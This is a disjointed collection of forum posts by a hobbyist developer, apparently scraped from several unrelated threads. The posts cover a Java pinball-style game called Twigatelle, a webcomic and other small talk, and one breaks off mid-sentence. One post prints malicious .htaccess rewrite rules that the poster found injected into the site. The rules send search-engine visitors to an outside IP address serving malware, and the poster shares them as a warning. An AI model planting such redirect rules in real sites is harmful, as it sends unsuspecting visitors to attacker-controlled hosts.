N.A.N.Y. 2010 / Re: NANY 2010 Teaser: Twigatelle
« on: December 17, 2009, 10:26 PM »
Folks, you can (probably) run the game from here:

http://head-in-the-clouds.com/game/Twiggles.jnlp

It's currently a 24 megabyte download

There's only one level at the moment, with boring old round shapes - nudone is waiting for me to request some graphics so when he works his magic I'll put a couple more levels in which will have more variation and even animation.

In the meantime, see if you can work out the following:
  • How to complete the level
  • What the colours represent
  • What the bonuses with silly names do

I hope you enjoy...

All the source code will be available at some point if anyone's interested.

Everything is home grown and Twiggles is quite proud of the collision routines. You'll see why in the later levels. There's also some reasonable code for poisson distribution, algorithmic textures, fast beziers, particles etc.

The game is playable in its basic form by now. DC hero nudone is doing some graphics for us, but if anyone wants to try it out just let me know.

Thank you :)

By the way, not saying I didn't nick anyone else's algorithms. Mr Perlin just kicked the back of my chair.

Description
Twigatelle is a simple game developed in Java inspired by any number of those pachinko-type games where little thingies bounce around hitting other thingies in a slightly hypnotic way. The name is a contraction of "Twiggles" and "bagatelle"

I chose to code up this game since:
(a) I like playing simple pinball-type games

(b) I was interested to see if I could develop a little game in Java that ran at a good framerate on any reasonable PC, Max, *nix box

(c) I wanted to see if I was capable of coding up various maths routines (collision and rebound of odd-shaped objects, procedural textures etc.) from scratch without nicking anyone elses source

and (d) I have not yet grown out of coding for 'fun'

Features: Java 2D game with animation, sound, simple particle system, simple physics effects, simple everything really. What can I say? I'm a simple kind of guy...

Features
  • Bouncy balls.
  • Things that bouncy balls hit.

Planned Features
  • Further items for the bouncy balls to collide with.

« on: December 09, 2009, 10:00 PM »
I write on behalf of Twiggles: this is his pledge to release a small application for NANY 2010. We will be documenting his progress at Head in the Clouds.

Mouser, with his usual vision and supportive nature made a great suggestion for the site yesterday:

http://www.head-in-t...05/competition-time/

Yes, it's competition time.

Anyone who's been visiting the site regularly (thank you very much!) or who has not visited yet (hurry! hurry!) or who used to visit but had forgotten to do so recently (shame on you!) should stop by and take a look.

Everyone has fun ideas, so please feel free to share with us all and I'll crank them out to the best of my ability.

Mouser, thank you very much for your kind words :)

In this case "charm" could be read as "wonky lettering and dodgy draughtsmanship".

Good to see Codex Transportica back. I had been missing writing bits and pieces for that project.

Thank you for your kind words. You're right - random isn't!

The problem is that of course I kick off the randomizer with the same seed every time, so that you can go to, say, "puzzle number 99" and know it's the same puzzle as last time you went to 99.

But there's no reason why goto random could not do just that!

I'll make a small change very shortly and re-upload.

Get her your phone number and credit card.

Although she'd be happy to help - she's a huge Cody / Twiggles / Cobbe fan and the thought of any of your work drying up would be enough incentive for her. It's just the commute that presents a problem.

1135
I work from home most of the time nowadays, and I have a similar service to this already which has proven to be extremely effective.

It's called "my wife"

I always try to include a couple of in-jokes and weird names for the observant.

I'm writing a short blog entry on the HITC site about how we cartoon together... look out for that on Thursday.

Oh my... thank you very much!  :-[ Nick makes it a pleasure to write this stuff based on those wild illustrations. And we owed our readers a hero by now

Intriguing! Could be a fun project if the timing works out. Thanks.

Thank you for your support.  :)

And I'm sure glad you started shouting when you saw that malware site. I just hope nobody made the mistake of clicking on anything. In my case, Google itself warned me off.

1142
I have about a dozen sites, some WP, some not, and all of them had had the .htaccess file rewritten. I have some boob on live chat right now at my ISP's HQ, blithering about how it must be my fault - after having just said that many other of their sites had also been hacked.  Genius

1143
Here's what I just found on the hitc website's .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

In other words some Moldavian son-of-a-biscuit is redirecting our incoming traffic to their malware site.

This is now cleaned up, but we're down at the moment doing damage assessment.

I gather this is happening with other sites also, so please spread the word!

1144
Thank you for your kind words!

Being hijacked is a hell of a way to get the sites noticed  I usually prefer if people just "stumble" us ;)

1145
Dangit. It's lucky you guys are really on the ball and taking all precautions. I just hope to god that no-one fell for it... :(

1146
I get the same feed, so I just re-checked the link. Right now it took me (via a redirection from FeedBurner) to our own site as expected. But we're glad of the heads up!

When you say malware, was it actually a site trying to do something nasty to you, or just one of those annoying sites that's packed full or useless irrelevant links and adwords? Because if so, that's just our ISP's standard 404 page. HITC was down briefly yesterday.

Thanks,
timns

I've been "committed" to Vista for a couple of months now. The main lesson I have learned is UPDATE THOSE DRIVERS! Just about every issue I have had has been resolved by getting the latest of the latest.

Last problem I am seeing is the network dropping complet

Indeed I do have something to say, although it may not add much: thank you, thank you!

It makes me very happy to think that folks are actually enjoying the strip maybe as much as I am enjoying writing it. Nick makes it really come to life with his illustrations, ideas and feedback - since he started drawing out some of the strips, I've become positively prolific! We have around 80 strips in the pipeline at the moment.
